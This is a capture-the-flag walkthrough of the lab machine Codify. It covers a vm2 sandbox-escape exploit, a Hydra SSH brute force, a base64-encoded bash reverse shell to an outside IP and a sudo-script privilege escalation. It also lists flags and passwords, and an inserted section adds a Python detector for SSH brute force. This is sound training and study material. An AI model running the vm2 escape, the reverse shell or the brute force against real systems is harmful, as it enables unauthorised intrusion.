This is my walkthrough of Codify.

Initial Scan

sudo nmap -T4 -v 10.129.82.199
sudo nmap -T4 -Pn -p 22,80,3000 -sV -sC -v 10.129.82.199 -oA Codify

HTTP

Had to edit the hosts file to get the webpage.

Checking out their About Us page

Looking around for VM2 CVEs, I found this article on Snyk about RCE with VM2 after seeing a couple of others. Testing the other PoCs, I didn't get anywhere until I found this one. We can run commands on the host, bypassing the VM.

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("ls -al").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked

whoami shows us the svc user. Also, looking at /etc/passwd, we see an additional user, joshua.

BruteForce

Trying to run Hydra against the user joshua for a password

hydra -l joshua -P /usr/share/wordlists/rockyou.txt -V ssh://10.129.82.199

joshua:spongebob1
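The Hydra run above produces a dense burst of failed SSH logins for one account from one source, which is what a defender would key on. As an added detection example (my own, not part of the original walkthrough), this parses sshd auth-log lines and flags any account/source pair that racks up five or more failures within sixty seconds; the log lines, threshold and window are constructed assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Matches the "Failed password" line sshd writes to auth.log / the journal.
FAILED_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def parse_ts(text, year=2024):
    # syslog timestamps carry no year; assume one so they can be compared
    return datetime.strptime(f"{year} {text}", "%Y %b %d %H:%M:%S")

def detect_ssh_bruteforce(lines, threshold=5, window=timedelta(seconds=60)):
    """Return {(user, src): total_failures} for every (account, source) pair
    that hit >= threshold failed logins inside one sliding window; a Hydra
    run against a single account looks exactly like this."""
    events = defaultdict(list)
    for line in lines:
        m = FAILED_RE.search(line)
        if m:
            events[(m["user"], m["src"])].append(parse_ts(m["ts"]))
    hits = {}
    for key, stamps in events.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while t - stamps[start] > window:   # slide the window forward
                start += 1
            if end - start + 1 >= threshold:
                hits[key] = len(stamps)
                break
    return hits

# Constructed sample lines (not a capture from the box): a burst against joshua, one stray svc failure, a success.
SAMPLE_LOG = [
    "Nov 12 10:15:01 codify sshd[2231]: Failed password for joshua from 10.10.14.53 port 44120 ssh2",
    "Nov 12 10:15:01 codify sshd[2233]: Failed password for joshua from 10.10.14.53 port 44122 ssh2",
    "Nov 12 10:15:02 codify sshd[2235]: Failed password for joshua from 10.10.14.53 port 44124 ssh2",
    "Nov 12 10:15:02 codify sshd[2237]: Failed password for joshua from 10.10.14.53 port 44126 ssh2",
    "Nov 12 10:15:03 codify sshd[2239]: Failed password for joshua from 10.10.14.53 port 44128 ssh2",
    "Nov 12 10:15:03 codify sshd[2241]: Failed password for joshua from 10.10.14.53 port 44130 ssh2",
    "Nov 12 10:20:45 codify sshd[2302]: Failed password for svc from 10.10.14.60 port 50212 ssh2",
    "Nov 12 10:21:10 codify sshd[2304]: Accepted password for joshua from 10.10.14.53 port 44300 ssh2",
]
if __name__ == "__main__":
    for (user, src), count in detect_ssh_bruteforce(SAMPLE_LOG).items():
        print(f"possible SSH brute force: {count} failures for {user} from {src}")
```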

Obtaining shell

Working to get a shell as svc. Looking around for a reverse shell, I found PayloadsAllTheThings.

bash -i >& /dev/tcp/10.10.14.53/1234 0>&1

Running it normally didn't work, so I encoded it.

echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash

Full command

const { VM } = require("vm2");
const vm = new VM();

const code = `
  const err = new Error();
  err.name = {
    toString: new Proxy(() => "", {
      apply(target, thiz, args) {
        const process = args.constructor.constructor("return process")();
        throw process.mainModule.require("child_process").execSync("echo 'YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC41My8xMjM0IDA+JjE=' | base64 -d | bash").toString();
      },
    }),
  };
  try {
    err.stack;
  } catch (stdout) {
    stdout;
  }
`;

console.log(vm.run(code)); // -> hacked

Foothold

We have a shell as svc.

Seeing what permissions we have

User Flag

After getting a shell as the svc user, I got Joshua's password with Hydra.

User flag: c53cdd4688463871ba3f4020ab6f3ccb

Priv Esc

We got the note “User joshua may run the following commands on codify: (root) /opt/scripts/mysql-backup.sh”. So, looking at the shell script:

Running that as root, we get:

Get pspy: initiate another SSH session, get pspy64 onto the target machine, run it, then run the /opt/scripts/mysql-backup.sh script.

Root pass: kljh12k3jhaskjh12kjh3

Root flag: 4e43f866588b3b3433196af3cef8b768